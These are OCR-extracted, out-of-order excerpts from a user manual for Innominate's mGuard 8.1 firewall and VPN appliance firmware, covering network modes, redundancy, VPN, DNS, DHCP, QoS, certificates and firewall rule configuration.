219. en_02 m Guard basics 1 2 3 DMZ A DMZ demilitarized zone is a protected network that is located between two other net works For example a company s website may be in the DMZ so that new pages can only be copied to the server from the Intranet using FTP However the pages can be read from the Internet via HTTP IP addresses within the DMZ can be public or private and the mGuard which is connected to the Internet forwards the connections to private addresses within the DMZ by means of port forwarding A DMZ scenario can be established either between two mGuards see Figure 1 3 or via a dedicated DMZ port of the mGuard rs4000 3G DMZ S 3 Figure 1 3 DMZ 1 2 4 VPN gateway The VPN gateway provides company employees with encrypted access to the company network from home or when traveling mGuard performs the role of the VPN gateway IPsec capable VPN client software must be installed on the external computers or failing that the computer is equipped with a mGuard ee Pre SS B kJ bd Figure 1 4 VPN gateway 105661_en
220. ensive Therefore the active mGuard may have an obsolete IPsec re play window following a fail over This means that a replay attack is possible for a brief pe riod until the real VPN partner has sent the next ESP packet for the corresponding IPsec SA or until the IPSec SA has been renewed However the traffic must be captured completely for this to occur 350 Innominate Security Technologies 105661_en_02 Redundancy Dead Peer Detection Please note the following point for Dead Peer Detection With Dead Peer Detection set a higher timeout than the upper limit for the Fail over switching time on the redundant pair See under IPsec VPN gt gt Connections gt gt Edit gt gt IKE Options Delay between requests for a sign of life Otherwise the VPN partners may think that the redundant pair is dead even though it is only dealing with a fail over Data traffic In the event of a high latency in a network used for state synchronization updates the mGuard on standby is assigned the outdated state The same thing also happens in the event of serious data losses on this network This does not occur however as long as no more than two back to back updates are lost This is because the mGuard on standby automatically requests a repeat of the update The latency requirements are the same as those detailed under Fail over switching time on page 335 Actual IP addresses VPN partners may not send ESP traffic to the
221. ent has been determined If no Stealth Management IP Address or Client s MAC address is configured in static Stealth mode then DAD ARP requests are sent via the internal interface see RFC 2131 Dynamic Host Configuration Protocol Section 4 4 1 Only in Router network mode with static DHCP router mode or Stealth net work mode Only for mGuard rs4000 mGuard centerport mGuard industrial rs m uard blade mGuard delta EAGLE mGuard In these network modes the serial interface of the mGuard can be configured as an additional Secondary External Interface mGuard rs4000 3G only in Router network mode with Static or DHCP router mode the built in mobile network modem of the mGuard can be config ured as an additional secondary external interface The secondary external interface can be used to transfer data traffic permanently or tem porarily to the external network WAN If the secondary external interface is activated the following applies 116 Innominate Security Technologies 105661_en_02 Network menu Network gt gt Interfaces gt gt General Stealth network mode In Stealth network mode Only the data traffic generated by the mGuard is subject to the routing specified for the secondary external interface not the data traffic from a locally connected computer Lo cally connected computers cannot be accessed remotely either only the mGuard itself can be accessed remotely if the c
222. ent of a network lobotomy on page 338 After a fail over semi unidirectional or complex connections that were established in the second before the fail over may be interrupted See Fail over when establishing complex connections on page 338 and Fail over when establishing semi unidirection al connections on page 338 Firewall redundancy does not support the mGuard pci in Driver mode State synchronization does not replicate the connection tracking entries for ICMP echo requests forwarded by the mGuard Therefore ICMP echo replies can be dropped ac cording to the firewall rules if they only reach the mGuard after the fail over is complet ed Please note that ICMP echo replies are not suitable for measuring the fail over switching time Masquerading involves hiding the transmitter behind the first virtual IP address or the first internal IP address This is different to masquerading on the mGuard without fire wall redundancy When firewall redundancy is not activated the external or internal IP address hiding the transmitter is specified in a routing table 105661_en_02 Redundancy 16 2 VPN redundancy VPN redundancy can only be used together with firewall redundancy The concept is the same as for firewall redundancy In order to detect an error in the system environment the activity is transmitted from the active mGuard to the mGuard on standby At any given point in time at least one mGuard in the redundant pair i
223. entification purposes The mGuard will not establish a connection to the service provider if the ISP does not give the correct name Password that must be specified during Internet service pro vider login to access the Internet Yes No The following two entry fields are shown when Yes is selected Password that the mGuard requests from the server The mGuard only allows the connection if the server returns the agreed password 105661_en_02 Network gt gt Interfaces gt gt Dial out Subsequent fields If None is selected as the authentication method Network menu See under If None is selected as the authentication method on page 133 In this case the fields that relate to the PAP or CHAP authen tication methods are hidden Only the fields that define further settings remain visible below Authentication Dial on demand idle timeout idle time Seconds Local IP Remote IP Netmask None w Yes v Yes v 300 0 0 0 0 0 0 0 0 0 0 0 0 Other common settings Network gt gt Interfaces gt gt Dial out PPP dial out options Dial on demand 105661_en_02 Yes No Whether Yes or No the telephone connection is always established by the mGuard If set to Yes default this setting is useful for telephone con nections where costs are calculated according to the connec tion time The mGuard only commands the modem to establish a tele phone connection when network
224. enu 12 QoS menu a This menu is not available on the mGuard rs2000 3G QoS Quality of Service refers to the quality of individual transmission channels in IP net works This relates to the allocation of specific resources to specific services or communi cation types so that they work correctly The necessary bandwidth for example must be provided to transmit audio or video data in realtime in order to reach a satisfactory commu nication level At the same time slower data transfer by FTP or e mail does not threaten the overall success of the transmission process file or e mail transfer 12 1 Ingress Filters An ingress filter prevents the processing of certain data packets by filtering and dropping them before they enter the mGuard processing mechanism The mGuard can use an in gress filter to avoid processing data packets that are not needed in the network This results in a faster processing of the remaining i e required data packets Using suitable filter rules administrative access to the mGuard can be ensured with high probability for example Packet processing on the mGuard is generally defined by the handling of individual data packets This means that the processing performance depends on the number of packets to be processed and not on the bandwidth Filtering is performed exclusively according to features that are present or may be present in each data packet the sender and recipient IP address specified in the
225. er Current Provider 170 Provider selection Innominate Security Technologies Indicates the state of the mobile network engine Engine is powered down Mobile network and positioning disabled mobile network and GPS switched off Engine is powered up Only positioning possible mobile network disabled GPS enabled Mobile network connection for sending receiving text message and calls without packet data transmission SIM card inserted PIN correctly entered Mobile network connection for sending receiving text message and calls with packet data transmission SIM card inserted PIN correctly entered Router network mode or secondary router mode set to Built in mobile network modem APN correctly entered PPP authentication correctly stored Strength of the mobile network signal from 0 100 113 dBm gt 51 dBm The optimum received power is 100 signal strength and 51 dBm attenuation LAC area code location in mobile phone network CID unique mobile phone cell ID PLMN provider GMS EDGE UTRAN HSUPA HSDPA CDMA Shows the current mobile network standard Shows the current status of the packet transmission Name of the mobile network provider No mobile networking mobile network connection disabled Generic GSM UMTS Provider mobile network connection via the SIM card provider Verizon CDMA US in the USA mobile network connection without SIM card via MEID code which is prin
226. er that implements remote access may have to specify the port number defined here during login Example lf this mGuard can be accessed over the Internet via address 123 124 125 21 and default port number 22 has been speci fied for remote access you may not need to enter this port number in the SSH client e g PUTTY or OpenSSH of the re mote partner lf a different port number has been set e g 2222 this must be specified e g ssh p 2222 123 124 125 21 Default 120 seconds Values from 0 to 3600 seconds can be set Positive values in dicate that the mGuard is sending a query to the partner within the encrypted SSH connection to find out whether it can still be accessed The request is sent if no activity was detected from the partner for the specified number of seconds e g due to network traffic within the encrypted connection The value entered relates to the functionality of the encrypted SSH connection As long as the functions are working prop erly the SSH connection is not terminated by the mGuard as a result of this setting even when the user does not perform any actions during this time Because the number of simultaneously open sessions is lim ited see Concurrent Session Limits it is important to termi nate sessions that have expired Therefore the request for a sign of life is preset to 120 sec onds in the case of Version 7 4 0 or later If a maximum of three requests for a sign of life are issued
227. er with the Aggressive Mode insecure setting all Diffie Hellman algorithms should be selected under IKE Options for the responder of the connection When using a fixed Diffie Hellman algorithm it must be the same for all con nections using the Aggressive Mode insecure setting 274 Innominate Security Technologies 105661_en_02 IPsec VPN menu IPsec VPN gt gt Connections gt gt Edit gt gt Authentication 105661_en_02 ISAKMP Mode Main Mode secure In main mode the party wishing to establish the connection initiator and the responder negotiate an ISAKMP SA We recommend using certificates in main mode Aggressive Mode insecure Encryption for aggressive mode is not as secure as for main mode The use of this mode can be justified if the responder does not know the initiator s address in advance and both parties wish to use pre shared keys for authentication An other reason may be the wish for faster connection establish ment if the responder s principles are sufficiently known e g an employee wishing to access the company network Requirement Cannot be used together with the redundancy function The same mode must be used between peers Iftwo VPN clients downstream of the same NAT gateway establish the same connection to a VPN gateway they must use the same PSK As an alternative the VPN gate way must provide each client with a different VPN identifi er for the pa
228. ernet connection is re quired for this Innominate Security Technologies 179 mGuard 8 1 180 Innominate Security Technologies 105661_en_02 Authentication menu 7 Authentication menu 7 1 Authentication gt gt Administrative Users 7 1 1 Passwords Authentication Administrative Users Passwords RADIUS Filters root Root Password oid Password Account root New Password New Password again admin Administrator Password New Password Account admin New Password again user Disable VPN until the user is authenticated via HTTP Lv Yes User Password Lael word New Password again Administrative Users refers to users who have the right depending on their authorization level to configure the mGuard root and administrator authorization levels or to use it user authorization level Authentication gt gt Administrative Users gt gt Passwords To log into the corresponding authorization level the user must enter the password as signed to the relevant authorization level root admin or user root Root Password Grants full rights to all parameters of the mGuard Account root Background only this authorization level allows unlimited ac cess to the mGuard file system User name cannot be modified root Default root password root e To change the root password enter the old password in the Old Password field then the new password in the two corresponding fields below admin A
229. ertificates CA Certificates Remote Certificates CRL Certificate settings Check the validity period of certificates and CRLs Enable CRL checking CRL download interval Never Authentication gt gt Certificates gt gt Certificate settings Certificate settings The settings made here relate to all certificates and certificate chains that are to be checked by the mGuard This generally excludes the following Self signed certificates from partners All remote certificates for VPN Check the validity No the validity period specified in certificates and CRLs is ig period of certificates nored by the mGuard and CRLs Wait for synchronization of the system time The validity period specified in certificates and CRLs is only observed by the mGuard if the current date and time are known to the mGuard Through the built in clock for the m uard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard centerport mGuard industrial rs mGuard delta mGuard smart or By synchronizing the system clock see Time and Date on page 35 Until this point all certificates to be checked are considered in valid for security reasons 105661_en_02 Innominate Security Technologies 195 mGuard 8 1 Authentication gt gt Certificates gt gt Certificate settings Enable CRL checking CRL download interval 196 Innominate Security Technologies Yes when CRL checking is enabled the mGuard consults the
230. es the PSKs being sent to the mGuard on standby for a prolonged period an incorrect configuration remains concealed during this period mak ing it difficult to detect 16 2 7 Interaction with other devices Resolving host names If host names are configured as VPN gateways the mGuard devices in a redundant pair must be able to resolve the host names for the same IP address This applies especially when DynDNS Monitoring see Page 253 is activated If the host names are resolved from the mGuard on standby to another IP address the VPN connection to this host is interrupted following a fail over The VPN connection is reestab lished through another IP address This takes place directly after the fail over However a short delay may occur depending among other things on what value is entered under DynDNS Monitoring for the Refresh Interval sec Obsolete IPsec replay window IPsec data traffic is protected against unauthorized access To this end each IPsec channel is assigned an independent sequential number The mGuard drops ESP packets which have the same sequential number as a packet that has already been decrypted for a specific IPsec channel by the mGuard This mechanism is known as the IPsec replay window It prevents replay attacks where an attacker sends previously recorded data to simulate someone else s identity The IPsec replay window is only replicated sporadically during state synchronization as it is very resource int
231. ess to all functions By default the audit user role can only be activated via the mGuard device manager in the same way as netadmin Innominate Security Technologies 19 mGuard 8 1 2 3 Input help during configuration system mes sages With firmware 8 0 or later modified or invalid entries are highlighted in color on the web in terface With firmware 8 1 or later dynamic values are displayed in red In this way status mes saged indicating a current value can be recognized more easily System messages which explain why an entry is invalid for example are also displayed a The browser used must allow JavaScript for this support to function WARNING THE ROOT PASSWORD IS NOT CONFIGURED i T iG ua rd WARNING THE ADMIN PASSWORD IS NOT CONFIGURED 8 0 0 default Logged in as admin with role admin from 192 168 1 10 on mguard Management System Settings System Settings Web Settings System Message Licensing There are invalid values Update Figure 2 1 Example system message Modified entries are highlighted in blue on the relevant page and in the associated menu item until the changes are saved or reset Exception modified tables Invalid entries are highlighted in red on the relevant page and tab and in the associ ated menu item The modified or invalid entries remain highlighted even when you close a menu When necessary information relating to the system is displayed at the top of the
232. established to the same session When NAT is also activated one or more locally connected computers can communicate with external computers by SIP via the mGuard This function can only be activated when a suitable license key OPC Inspector is installed With OPC Classic communication always starts via port 135 The client and server then negotiate one or more additional connections on new ports To enable these connections all ports of an interconnected firewall needed to be open until now If OPC classic is activated it is enough to only enable port 135 for a client server pair using the firewall rules The mGuard inspects the user data of the packets deep packet inspection It checks in the user data sent via this port whether a new connection has been negotiated and opens the negotiated port To do so communication between the cli ent and the server on port 135 must be enabled in both direc tions lf OPC classic is activated NAT procedures can be used If masquerading is to be used port forwarding of port 135 to the OPC server client must be activated on the LAN interface of the mGuard If the Sanity check for OPC classic is activated only OPC packets must be transmitted via OPC Classic port 135 and the newly negotiated ports 105661_en_02 Network Security menu Network Security gt gt Packet Filter gt gt Advanced Timeout for OPC clas Configures the timeout during which OPC traffic is expected si
233. etwork gt gt Interfaces gt gt General Stealth network mode Static Stealth Configuration Secondary External Inter face This menu item is not included in the scope of functions for the mGuard rs2000 3G m Guard rs2000 If this option is used make the relevant entries afterwards If it is not used the affected data packets are routed via the default gateway specified for the client Networks tobe routed over gt T e alternative gateways Network Specify the network in CIDR format see CIDR Classless Inter Domain Routing on page 24 Gateway The gateway via which this network can be accessed The routes specified here are mandatory routes for data pack ets created by the mGuard This setting has priority over other settings See also Network example diagram on page 25 Client s IP address The IP address of the computer connected to the LAN port Client s MAC address The physical address of the network card of the local com puter to which mGuard is connected e The MAC address can be determined as follows In DOS Start Programs Accessories Command Prompt enter the following command ipconfig all The MAC address does not necessarily have to be specified The mGuard can automat ically obtain the MAC address from the client The MAC address 0 0 0 0 0 0 must be set in order to do this Please note that the mGuard can only forward network packets to the client once the MAC address of the cli
234. etwork Address Translation NAT also known as P masquerading hides an entire net work behind a single device known as a NAT router If you communicate externally via a NAT router the internal computers in the local network and their IP addresses remain hid den The remote communication partner will only see the NAT router with its IP address In order to allow internal computers to communicate directly with external computers on the Internet the NAT router must modify the IP datagrams that are sent from internal comput ers to remote partners and received by internal computers from remote partners If an IP datagram is sent from the internal network to a remote partner the NAT router mod ifies the UDP and TCP headers of the datagram replacing the source IP address and source port with its own official IP address and a previously unused port For this purpose the NAT router uses a table in which the original values are listed together with the corre sponding new ones When a response datagram is received the NAT router uses the specified destination port to recognize that the datagram is intended for an internal computer Using the table the NAT router replaces the destination IP address and port before forwarding the datagram via the internal network A port number is assigned to each device in UDP and TCP protocol based communication This number makes it possible to differentiate between multiple UDP or TCP connections betwe
235. face nisation used for state syn aoe The mGuard centerport supports a dedicated interface This chronization is areserved direct Ethernet interface or a dedicated LAN segment via which the state synchronization is sent The redundant pair can be connected through an additional dedicated Ethernet interface or an interconnected switch On a Dedicated Interface presence notifications CARP are also listened for on the third Ethernet interface Presence notifications CARP are also transmitted when the mGuard is active However no additional routing is supported for this interface Frames received on this interface are not forwarded for secu rity reasons The connection status of the third Ethernet interface can be queried via SNMP 105661_en_02 Innominate Security Technologies 311 mGuard 8 1 Redundancy gt gt Firewall Redundancy gt gt Redundancy IP of the dedicated Only available when Dedicated Interface is selected interface IP IP address used on the third network interface of the mGuard centerport for state synchronization with the other mGuard Default 192 168 68 29 Netmask Subnet mask used on the third network interface of the mGuard centerport for state synchronization with the other mGuard Default 255 255 255 0 Use VLAN When Yes is selected a VLAN ID is used for the third network interface VLAN ID 1 2 3 4094 default 1 VLAN ID when this setting is activated Disable the avai
236. fies the following the secondary external inter face is only activated when specific conditions are met and it is only then that the rout ing settings of the secondary external interface take effect Network address 0 0 0 0 0 generally refers to the largest definable network i e the In ternet In Router network mode the local network connected to the mGuard can be ac cessed via the secondary external interface as long as the specified firewall settings allow this 105661_en_02 Innominate Security Technologies 119 mGuard 8 1 Network gt gt Interfaces gt gt General continued Secondary External Interface continued Secondary External Inter face continued Network mode Built in mo bile network modem Operation Mode temporary Probes for activation Network Mode Built in mobile network modem w Operation Mode temporary w Secondary Externa Routes gt X p 192 168 3 0 24 gateway Current state of activation On standby Probes for activation D x meee The socentiery codcmalinierincnia D 2 activated only if al probes fail and g ICMP Ping w 141 1 1 1 if the operation mode is set to temporary Probe Interval seconds 20 Number of times all probes need to fail during subsequent runs before the secondary external interface is activated 2 DNS Mode use primary DNS settings untouched w User defined name servers f they should be reachable via the gt 2X I ee secondary e
237. for proxy server login Password Password for proxy server login 105661_en_02 Innominate Security Technologies 167 mGuard 8 1 6 7 Network gt gt Mobile Network a This menu is only available on the mGuard rs4000 rs2000 3G The mGuard rs4000 rs2000 3G supports the establishment of a WAN via mobile network The following mobile network standards are supported 3G UMTS HSDPA CDMAEV DO EDGE GPRS In addition the GPS and GLONASS positioning systems are supported for positioning and time synchronization Note that the time synchronization and position data from the posi tioning systems can be manipulated by interference signals GPS spoofing Establishing a mobile network connection To establish a mobile network connection a matching antenna must be connected to the device see device user documentation The mGuard also requires at least one valid mini SIM card in ID 000 format via which it assigns and authenticates itself to a mobile network The mGuard rs4000 rs2000 3G can be equipped with two SIM cards The SIM card in the SIM 1 slot is the primary SIM card which is normally used to establish the connection If this connection fails the device can turn to the second SIM card in slot SIM 2 You can set whether and under which conditions the connection to the primary SIM card is restored The state of the SIM cards is indicated via two LEDs on the front of the mGuard rs4000 rs2000 3G The LEDs
238. format see CIDR Classless Inter Domain Rout ing on page 24 From Port To Port Only evaluated for TCP and UDP protocols any refers to any port startport endport e g 110 120 refers to a port area Individual ports can be specified using the port number or the corresponding service name e g 110 for pop3 or pops for 110 105661_en_02 Innominate Security Technologies 213 mGuard 8 1 Network Security gt gt Packet Filter gt gt Rule Records Action Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is informed of their rejection In Stealth mode Reject has the same effect as Drop Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not informed of their whereabouts Name of rule sets if defined When a name is specified for rule sets the firewall rules saved under this name take effect Comment Freely selectable comment for this rule Log For each firewall rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default setting If aconnection associated with a firewall rule record has been established and is contin uously creating data traffic deactivation of the firewall rule record might not interrupt this connection as expected This happens because the outgoing response
239. forthe hosts example local Enabled Yes v Resolve IP Addresses also Yes w RE s oo o mo O OOO e T host 3600 192 168 1 1 Domain for the hosts The name can be freely assigned but it must adhere to the rules for assigning domain names It is assigned to every host name Enabled Yes No Switches the Local Resolving of Hostnames function on Yes or off No for the domain specified in the field above Resolve IP Addresses No the mGuard only resolves host names i e it supplies the also assigned IP address for host names Yes same as for No It is also possible to determine the host names assigned to an IP address Hostnames The table can have any number of entries A host name may be assigned to multiple IP ad dresses Multiple host names may be assigned to one IP address TTL Abbreviation for Time To Live Value specified in seconds Default 3600 1 hour Specifies how long called assignment pairs may be stored in the cache of the calling computer IP The IP address assigned to the host name in this table row 158 Innominate Security Technologies 105661_en_02 Network menu Example Local Resolving The Local Resolving of Hostnames function is used in the following scenario of Hostnames for example A plant operates a number of identically structured machines each one as a cell The local networks of cells A B and C are each connected to the plant network via the Internet using the mGua
240. from the PPPoE server Otherwise the PPPoE service name is not used PPPoE Service Name PPPoE service name Automatic Re con If Yes is selected specify the time in the Re connect daily at nect field This feature is used to schedule Internet disconnection and reconnection as required by many Internet service pro viders so that they do not interrupt normal business opera tions When this function is enabled it only takes effect if synchroni zation with a time server has been carried out see Manage ment gt gt System Settings on page 33 Time and Date on page 35 Re connect daily at Specified time at which the Automatic Re connect function see above should be performed Internal Networks See Internal Networks on page 123 Secondary External Inter See Secondary External Interface on page 116 face 105661_en_02 Innominate Security Technologies 127 mGuard 8 1 Router network mode PPTP router mode Network Interfaces General Ethernet Network Status External IP address Active Defaultroute Used DNS servers Network Mode Network Mode Router Mode t 3 PPTP When Router is se lected as the network PPTP Login mode and PPTP is PPTP Password selected as the router Dial out Dial in Modem Console 172 16 66 49 172 16 66 18 10 1 0 253 Router w PPTP wv user provider example n Static from field below w Network gt gt Interfaces gt gt Ge
241. fter it rings If using the extended HAYES command set append the character string AT amp S0 1 OK a space followed by AT amp S0 1 followed by a space followed by OkK to the initializa tion sequence Some external modems depending on their default settings require a physical connec tion to the DTR cable of the serial interface in order to operate correctly Because the mGuard models do not provide this cable at the external serial interface the character string AT amp DO OK a space followed by AT amp D0O followed by a space fol lowed by OK must be appended to the above initialization sequence According to the extended HAYES command set this sequence means that the modem does not use the DTR cable If the external modem is to be used for outgoing calls it is connected to a private branch exchange and if this private branch exchange does not generate a dial tone after the con nection is opened then the modem must be instructed not to wait for a dial tone before dialing In this case append the character string ATX3 OK a space followed by ATX3 fol lowed by a space followed by OkK to the initialization sequence In order to wait for the dial tone the control character W should be inserted in the Phone number to call after the digit for dialing an outside line 142 Innominate Security Technologies 105661_en_02 Network menu COM server for mGuard platforms
242. g The integrated switch controls port mirroring in order to moni Receiver tor the network traffic Here you can decide which ports you Only for devices with an inter nal switch want to monitor and the switch then sends copies of data packets from the monitored port to a selected port The port mirroring function enables any packets to be for warded to a specific recipient You can select the receiver port or the mirroring of the incoming and outgoing packets from each switch port MAU Configuration Configuration and status indication of the Ethernet connections Port Name of the Ethernet connection to which the row refers Media Type Media type of the Ethernet connection 148 Innominate Security Technologies 105661_en_02 Network menu Network gt gt Ethernet gt gt MAU settings Automatic Configura Yes tries to determine the required operating mode auto tion matically No uses the operating mode specified in the Manual Configuration column When connecting the EAGLE mGuard to a hub please note the following when Automatic Config uration is deactivated the Auto MDIX function is also deactivated This means that the port of the EAGLE mGuard must either be connected to the uplink port of the hub or connected to the hub using a cross link cable Manual Configuration The desired operating mode when Automatic Configuration is set to No Current Mode The current operating mode of the netwo
243. g the new update must then first be obtained so that the required license file is available for the flashing process This applies to major release upgrades e g from Version 4 x y to Version 5 x y to Version 6 x y etc Management gt gt Licensing gt gt Overview Basic settings Feature License Shows which functions are included with the installed mGuard licenses e g the number of possible VPN tunnels whether remote logging is supported etc 4 3 2 Install A VPN 1000 license can only be installed on the mGuard centerport Only an MRU and LFS license can be installed on the mGuard rs2000 3G More functions can be added later to the mGuard license you have obtained You will finda Management Licensing Overview Install i Terms of License Automatic License Installation Voucher Serial Number Voucher Key Resa Lenses Manual License Installation order teense Fae Dahan voucher serial number and a voucher key in the voucher included with the mGuard The voucher can also be purchased separately It can be used to Request the required feature license file Install the license file that you receive following this request 105661_en_02 Innominate Security Technologies 67 mGuard 8 1 Management gt gt Licensing gt gt Install Automatic License Installa Voucher Serial Num Enter the serial number printed on the voucher and the corre tion ber Voucher Key sponding voucher key then
244. ginal destination port specified in the incoming data packets Either the port number or the corresponding service name can be specified here e g 0003 for port 110 or http for port 80 This information is not relevant for the GRE protocol It is ig nored by the mGuard Redirect to IP The internal IP address to which the data packets should be forwarded and into which the original destination addresses are translated Redirect to Port The port to which the data packets should be forwarded and into which the original port data is translated Either the port number or the corresponding service name can be specified here e g 0003 for port 110 or http for port 80 This information is not relevant for the GRE protocol It is ig nored by the mGuard Comment Freely selectable comment for this rule Log For each individual port forwarding rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default settings 156 Innominate Security Technologies 105661_en_02 Network menu 6 4 Network gt gt DNS 6 4 1 DNS server DNS server DynDNS DNS DNS cache state Ready to resolve hostnames Used DNS servers 10 1 0 253 Servers to query User defined servers listed below v User defined name servers fs 25 F 10 1 0 253 In Stealth Mode only User defined and DNS Root Servers are supported Other settings will be ignored Loca
245. gnore NetBIOS over TCP traffic on TCP pot No wv 139 Stealth Management IP Address Here you can specify additional IP addresses to administrate the mGuard If you have set Stealth configuration to multiple clients remote access will only be possible using this IP address An IP address of 0 0 0 0 disables this feature Note using management VLAN is not supported in Stealth autodetect mode Management P addresses S rr TS T v 1 DX 192 168 11 1 255 255 255 0 No F 192 168 5 1 255 255 255 0 No v 1 Default gateway 192 168 11 10 Static routes The following settings are applied to traffic generated by the mGuard _ alternative wi a F F 192 168 101 0 24 10 1 0 253 Secondary External Interface Network Mode Off v Static Stealth Configuration Client s IP address 192 638 11 1 Clients MAC address 00 00 00 00 00 00 105661_en_02 Network menu Network gt gt Interfaces gt gt General Stealth network mode a Only applies if Stealth is selected as the network mode Network Mode 105661_en_02 Stealth configuration Autodetect ignore NetBIOS over TCP traffic on TCP port 139 autodetect static multiple clients autodetect The mGuard analyzes the network traffic and independently configures its network connection accordingly It operates transparently static If the mGuard cannot analyze the network traffic e g because the locally connected computer only receives data and d
246. gt DynDNS DynDNS Port Only visible when DynDNS Provider is set to DynDNS com patible Name of the port for the DynDNS provider DynDNS Login Enter the user name and password assigned by the DynDNS DynDNS Password provider here DynDNS Hostname The host name selected for this mGuard at the DynDNS ser vice providing you use a DynDNS service and have entered the corresponding data above The mGuard can then be accessed via this host name 105661_en_02 Innominate Security Technologies 161 mGuard 8 1 6 5 Network gt gt DHCP The Dynamic Host Configuration Protocol DHCP can be used to automatically assign the network configuration set here to the computer connected directly to the mGuard Under In ternal DHCP you can specify the DHCP settings for the internal interface LAN port and under External DHCP the DHCP settings for the external interface WAN port The Exter nal DHCP menu item is not included in the scope of functions for the mGuard rs2000 a The DHCP server also operates in Stea th mode In multi stealth mode the external DHCP server of the mGuard cannot be used if a VLAN ID is assigned as the management IP IP configuration for Windows computers when you start the DHCP server of the mGuard you can configure the locally connected computers so that they obtain their IP addresses automatically Under Windows XP e Inthe Start menu select Control Panel Network Connections e Right click
247. guration profile saved on the mGuard by the user e Click on Restore to the right of the name of the relevant configuration profile The corresponding configuration profile is activated Saving the configuration profile as a file on the configuration computer e Click on Download to the right of the name of the relevant configuration profile e Inthe dialog box that is displayed specify the file name and folder under which the configuration profile is to be saved as a file The file name can be freely selected Deleting a configuration profile e Click on Delete to the right of the name of the relevant configuration profile a The Factory Default profile cannot be deleted Saving the active configuration as a configuration profile on the mGuard e Enter the desired profile name in the Name for the new profile field next to Save Cur rent Configuration to Profile e Click on Save The configuration profile is saved on the mGuard and the name of the profile appears in the list of profiles already stored on the mGuard Innominate Security Technologies 15 mGuard 8 1 Management gt gt Configuration Profiles Upload Configuration to Profile Uploading a configuration profile that has been saved to a file on the configura External Config Storage ECS tion computer Requirement a configuration profile has been saved on the configuration computer as a file according to the procedure described above e E
248. h 0 0 0 0 0 stands for all addresses i e in this case no filtering is applied according to the IP address of the sender To spec ify an address area use CIDR format see CIDR Classless Inter Domain Routing on page 24 294 Innominate Security Technologies 105661_en_02 QoS gt gt Ingress Filters gt gt Internal External To IP Current TOS DSCP Guaranteed Upper Limit Comment 105661_en_02 QoS menu Specifies that only data packets that should be forwarded to the specified IP address may pass through Entries correspond to From IP as described above 0 0 0 0 0 stands for all addresses i e in this case no filtering is applied according to the IP address of the sender Each data packet contains a TOS or DSCP field TOS stands for Type of Service DSCP stands for Differentiated Services Code Point The traffic type to which the data packet belongs is specified here For example an IP phone will write a differ ent entry in this field for outgoing data packets compared to an FTP program When a value is selected here only data packets with this value in the TOS or DSCP field may pass through When set to All no filtering according to the TOS DSCP value is ap plied The number entered specifies how many data packets per second or kbps can pass through at all times according to the option set under Measurement Unit see above This ap plies to the data stream that conforms to the rule set
249. h mGuard devices It is used for encryption and is never trans mitted in plain text The password is important for security since the mGuard is vulnerable at this point We recom mend a password with at least 20 characters and numerous special characters printable UTF 8 characters It must be changed on a regular ba sis When changing the password proceed as follows a Check the status of the set password before you enter a new one There is only a valid password available and you are only permitted to enter a new id password if you can see a green check mark to the right of the entry field Set the new password on both mGuard devices It does not matter which order you do this in but the same password must be used in both cases If you inadvertently enter an incor rect password follow the instructions under How to proceed in the event of an incorrect password on page 308 As soon as a redundant pair has been assigned a new password it automatically negoti ates when it can switch to the new password without interruption The status is displayed using symbols We recommend observing this status for security reasons A red cross indicates that the mGuard has anew password that it wants to use However the old password is still in use A yellow check mark indicates that the new password is already in use but that the old password can still be accepted in case the other mGuard still uses it If no symbol is show
250. hased and installed Only identical mGuard devices can be used together in a redundant pair In Router network mode firewall redundancy is only supported with the static Router mode The Stealth network mode is currently not supported For further restrictions see Requirements for firewall redundancy on page 334 and Limits of firewall redundancy on page 344 Innominate Security Technologies 331 mGuard 8 1 16 1 1 Components in firewall redundancy Firewall redundancy is comprised of several components Connectivity check Checks whether the necessary network connections have been established Availability check Checks whether an active mGuard is available and whether this should remain active State synchronization of the firewall The mGuard on standby receives a copy of the current firewall database state Virtual network interface Provides virtual IP addresses and MAC addresses that can be used by other devices as routes and default gateways State monitoring Coordinates all components Status indicator Shows the user the state of the mGuard Connectivity check On each mGuard in a redundant pair checks are constantly made as to whether a connec tion is established through which the network packets can be forwarded Each mGuard checks its own internal and external network interfaces independently of each other Both interfaces are tested for a continuous connection This connecti
251. he primary external interface is specified as 10 0 0 0 8 while the external route of the secondary external interface is specified as 10 1 7 0 24 Data packets to network 10 1 7 0 24 are then routed via the secondary external interface al though the routing entry for the primary external interface also matches them Explana tion the routing entry for the secondary external interface refers to a smaller network 10 1 7 0 24 lt 10 0 0 0 8 This rule does not apply in Stealth network mode with regard to the stealth manage ment IP address see note under Stealth Management IP Address on page 114 Ifthe routing entries for the primary and secondary external interfaces are identical then the secondary external interface wins i e the data packets with a matching des tination address are routed via the secondary external interface The routing settings for the secondary external interface only take effect when the sec ondary external interface is activated Particular attention must be paid to this if the rout ing entries for the primary and secondary external interfaces overlap or are identical whereby the priority of the secondary external interface has a filter effect with the fol lowing result data packets whose destination matches both the primary and secondary external interfaces are always routed via the secondary external interface but only if this is activated Intemporary mode activated signi
252. he service contacts Service contacts service I Os can be connected to some mGuards mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mQGuard industrial rs A push button or an on off switch can be connected to inputs CMD 1 3 The push button or on off switch is used to establish and release predefined VPN connections or the defined firewall rule records For the VPN connections it can be set whether the VPN connection is to be switched via one of the service contacts IPsec VPN gt gt Connections gt gt Edit gt gt General If a switch is con nected the switch behavior can also be inverted For the firewall rule records it can be set whether a rule is to be switched via one of the ser vice contacts or if a VPN connection is to be switched Network Security gt gt Packet Filter gt gt Rule Records In this way one or more freely selectable VPN connections or firewall rule records can be switched A mixture of VPN connections and firewall rule records is also possible The web interface displays which VPN connections and which firewall rule records are con nected to one input Management gt gt Service I O gt gt Service I O In addition the behavior of outputs ACK 1 3 can be set on the web interface Management gt gt Service I O gt gt Service I O Outputs ACK 1 2 can be used to monitor specific VPN connections or firewall rule records and to display them using LEDs Alarm output ACK 3 monitors the fun
